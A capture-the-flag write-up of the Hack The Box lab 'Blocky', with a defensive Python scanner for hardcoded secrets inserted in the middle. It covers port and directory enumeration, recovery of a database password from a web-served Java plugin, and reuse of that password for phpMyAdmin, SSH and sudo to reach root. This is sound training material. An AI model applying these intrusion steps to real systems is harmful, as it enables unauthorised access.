Today we are going to solve another CTF challenge, “Blocky”, which is available online for those who want to sharpen their penetration testing and black-box testing skills. Blocky is a retired vulnerable lab presented by Hack The Box.
Level: Easy
Since these labs are available online, they have static IPs; the IP of Blocky is 10.10.10.37, so let’s begin with nmap port enumeration.
c:\Users\jacco>nmap -sC -sV 10.10.10.37
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-27 19:50 W. Europe Summer Time
Nmap scan report for 10.10.10.37
Host is up (0.030s latency).
Not shown: 996 filtered ports
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     ProFTPD 1.3.5a
22/tcp   open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp   open   http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.67 seconds
Knowing that port 80 is open on the victim, I opened its IP in the browser but found no remarkable clue on the welcome page.
Next, we use wfuzz to enumerate directories and find some interesting ones, such as /phpmyadmin, /wp-admin and /plugin/files, as you can confirm from the output below.
c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.37/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.37/FUZZ
Total requests: 220551

==================================================================
ID      Response   Lines    Word     Chars       Payload
==================================================================

000003:  C=200    313 L    3592 W    52256 Ch   "# Copyright 2007 James Fisher"
000004:  C=200    313 L    3592 W    52256 Ch   "#"
000001:  C=200    313 L    3592 W    52256 Ch   "# directory-list-2.3-medium.txt"
000002:  C=200    313 L    3592 W    52256 Ch   "#"
000005:  C=200    313 L    3592 W    52256 Ch   ""
000181:  C=301      9 L      28 W      309 Ch   "wiki"
000232:  C=301      9 L      28 W      315 Ch   "wp-content"
000510:  C=301      9 L      28 W      312 Ch   "plugins"
000777:  C=301      9 L      28 W      316 Ch   "wp-includes"
001064:  C=301      9 L      28 W      315 Ch   "javascript"
007171:  C=301      9 L      28 W      313 Ch   "wp-admin"
010816:  C=301      9 L      28 W      315 Ch   "phpmyadmin"
013818:  C=404
package com.myfirstplugin;

public class BlockyCore {
    public String sqlHost = "localhost";
    public String sqlUser = "root";
    public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";

    public BlockyCore() {}

    public void onServerStart() {}

    public void onServerStop() {}

    public void onPlayerJoin() {
        sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
    }

    public void sendMessage(String username, String message) {}
}
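The class above is the real lesson of this box: a database password compiled into a plugin that is served from the web root, and (as the rest of the writeup shows) reused for phpMyAdmin, SSH and sudo. As an added example, not code from the original writeup or from the BlockyCraft plugin, here is a small Python scanner of the kind a defender would run in CI to flag string literals assigned to credential-like identifiers; it is run against the decompiled class reproduced above and against a constructed hardened variant that reads the secret from environment variables (the BLOCKY_DB_USER and BLOCKY_DB_PASS names are assumptions).

```python
import re

# Constructed input: the decompiled BlockyCore class reproduced from the writeup.
VULNERABLE_JAVA = '''package com.myfirstplugin;
public class BlockyCore {
    public String sqlHost = "localhost";
    public String sqlUser = "root";
    public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
    public void onPlayerJoin() {
        sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
    }
}
'''

# Constructed input: the same class with the secret moved out of the source (assumed env names).
HARDENED_JAVA = '''package com.myfirstplugin;
public class BlockyCore {
    public String sqlHost = "localhost";
    public String sqlUser = System.getenv("BLOCKY_DB_USER");
    public String sqlPass = System.getenv("BLOCKY_DB_PASS");
}
'''

# A string literal assigned to a field or variable: name = "value"
ASSIGN_RE = re.compile(r'\b(?P<name>\w+)\s*=\s*"(?P<value>[^"]*)"')
# Identifier fragments that suggest the literal is a credential.
SECRET_NAME_RE = re.compile(r'pass|pwd|secret|token|api_?key|credential', re.I)
# Literals that are clearly placeholders rather than live secrets.
PLACEHOLDER_RE = re.compile(r'^(|\$\{.*\}|todo.*|changeme|x{3,}|<.*>)$', re.I)

def redact(value: str) -> str:
    """Keep a two-character prefix so a finding can be triaged without re-leaking it."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 4 else "*" * len(value)

def find_hardcoded_secrets(source: str) -> list:
    """Return (line_no, identifier, redacted_value) for every suspicious literal."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for m in ASSIGN_RE.finditer(line):
            name, value = m.group("name"), m.group("value")
            if SECRET_NAME_RE.search(name) and not PLACEHOLDER_RE.match(value):
                findings.append((line_no, name, redact(value)))
    return findings

if __name__ == "__main__":
    for label, src in (("BlockyCore.java", VULNERABLE_JAVA), ("hardened", HARDENED_JAVA)):
        hits = find_hardcoded_secrets(src)
        print(f"{label}: {len(hits)} finding(s)")
        for line_no, name, shown in hits:
            print(f'  line {line_no}: {name} = "{shown}"')
```

The scanner reports the sqlPass field on line 5 of the decompiled class and nothing for the hardened variant; sqlHost and sqlUser are deliberately not flagged because the name heuristic targets secrets, not connection metadata.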
Then I browsed to http://10.10.10.37/phpmyadmin and logged in to phpMyAdmin with the credentials found above.
Then I opened the WordPress database to pull usernames from it and found a user login, Notch, with user ID 1.
Now I try to get a shell on the victim through SSH, reusing the same password.
PS C:\Users\jacco> ssh notch@10.10.10.37
notch@10.10.10.37's password: 8YsqfCTnvxAUeduzjNSXe22
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.

Last login: Sun Dec 24 09:34:35 2017
notch@Blocky:~$ cat user.txt
59f*****3cd5
notch@Blocky:~$ sudo -l
[sudo] password for notch: 8YsqfCTnvxAUeduzjNSXe22
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
notch@Blocky:~$ sudo su
root@Blocky:/home/notch# cd ..
root@Blocky:/home# cd ..
root@Blocky:/# cd root
root@Blocky:~# ls
root.txt
root@Blocky:~# cat root.txt
0a9*****cd5f
Author: Jacco Straathof